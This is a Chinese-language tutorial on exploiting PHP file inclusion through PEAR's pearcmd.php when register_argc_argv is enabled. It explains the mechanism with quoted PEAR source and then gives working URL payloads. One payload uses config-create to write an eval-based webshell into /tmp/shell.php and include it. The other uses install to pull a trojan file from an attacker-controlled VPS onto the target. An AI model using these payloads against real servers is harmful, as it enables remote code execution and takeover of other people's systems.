Pearcmd文件包含

总结一下pearcmd文件包含的利用方法，如果碰到PHP+文件包含可以往这个方向尝试一下

利用条件

• 安装了pear扩展
• php开启了register_argc_argv选项

Docker会默认安装pear扩展，也会自动开启register_argc_argv选项

原理

pear扩展是一个php下的命令行扩展管理工具，默认的安装路径是/usr/local/lib/php/pearcmd.php，在命令行下可以直接使用pear或者php /usr/local/lib/php/pearcmd.php运行，如果存在文件包含漏洞，则可以利用这个命令行工具

如果打开register_argc_argv这个选项的话，URL中?后面的内容会全部传入至$_SERVER['argv']这个变量内 ，无论参数中是否存在等号

pear扩展在pearcmd.php中会获取命令行参数

PEAR_Command::setFrontendType('CLI');
$all_commands = PEAR_Command::getCommands();

$argv = Console_Getopt::readPHPArgv();
// fix CGI sapi oddity - the -- in pear.bat/pear is not removed
if (php_sapi_name() != 'cli' && isset($argv[1]) && $argv[1] == '--') {
    unset($argv[1]);
    $argv = array_values($argv);
}

这里调用了readPHPArgv()函数获取命令行参数

public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            return $_SERVER['argv'];
        }
        return $argv;
    }

readPHPArgv()函数从$argv、$_SERVER['argv']、$GLOBALS['HTTP_SERVER_VARS']['argv']等获取变量，而$_SERVER['argv']是可控的变量。因此，可以利用pear获取通过GET方式上传的变量。

利用

使用**php:7.4-apache**这个官方镜像做测试

寻找可用的pear命令

Commands:
build                  Build an Extension From C Source
bundle                 Unpacks a Pecl Package
channel-add            Add a Channel
channel-alias          Specify an alias to a channel name
channel-delete         Remove a Channel From the List
channel-discover       Initialize a Channel from its server
channel-info           Retrieve Information on a Channel
channel-login          Connects and authenticates to remote channel server
channel-logout         Logs out from the remote channel server
channel-update         Update an Existing Channel
clear-cache            Clear Web Services Cache
config-create          Create a Default configuration file
config-get             Show One Setting
config-help            Show Information About Setting
config-set             Change Setting
config-show            Show All Settings
convert                Convert a package.xml 1.0 to package.xml 2.0 format
cvsdiff                Run a "cvs diff" for all files in a package
cvstag                 Set CVS Release Tag
download               Download Package
download-all           Downloads each available package from the default channel
info                   Display information about a package
install                Install Package
list                   List Installed Packages In The Default Channel
list-all               List All Packages
list-channels          List Available Channels
list-files             List Files In Installed Package
list-upgrades          List Available Upgrades
login                  Connects and authenticates to remote server [Deprecated in favor of channel-login]
logout                 Logs out from the remote server [Deprecated in favor of channel-logout]
makerpm                Builds an RPM spec file from a PEAR package
package                Build Package
package-dependencies   Show package dependencies
package-validate       Validate Package Consistency
pickle                 Build PECL Package
remote-info            Information About Remote Packages
remote-list            List Remote Packages
run-scripts            Run Post-Install Scripts bundled with a package
run-tests              Run Regression Tests
search                 Search remote package database
shell-test             Shell Script Test
sign                   Sign a package distribution file
svntag                 Set SVN Release Tag
uninstall              Un-install Package
update-channels        Update the Channel List
upgrade                Upgrade Package
upgrade-all            Upgrade All Packages [Deprecated in favor of calling upgrade with no parameters]
Usage: pear [options] command [command-options] <parameters>
Type "pear help options" to list all options.
Type "pear help shortcuts" to list all command shortcuts.
Type "pear help version" or "pear version" to list version information.
Type "pear help <command>" to get the help for the specified command.

有两种利用方法

config-create

这个命令需要两个参数

pear config-create /Diana /tmp/test.txt

第一个参数会被写入第二个参数所创建的文件中，我们可以利用这点写入PHP木马，然后利用文件包含漏洞包含木马文件即可

?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd']);?>+/tmp/shell.php

写一个木马即可，然后连接Webshell

http://127.0.0.1/?file=/tmp/shell.php

install

这个命令会尝试下载文件，可以在自己的vps上挂一个木马

pear install http://[vps]:[port]/muma1.php

在/tmp/pear/download/目录下有一个muma1.php

修改payload，使用--installroot指定下载目录

?+install+--installroot+&file=/usr/local/lib/php/pearcmd.php&+http://[vps]:[port]/muma1.php

就可以实现传马了，文件目录是&file=/usr/local/lib/php/pearcmd.php\&/tmp/pear/download/muma1.php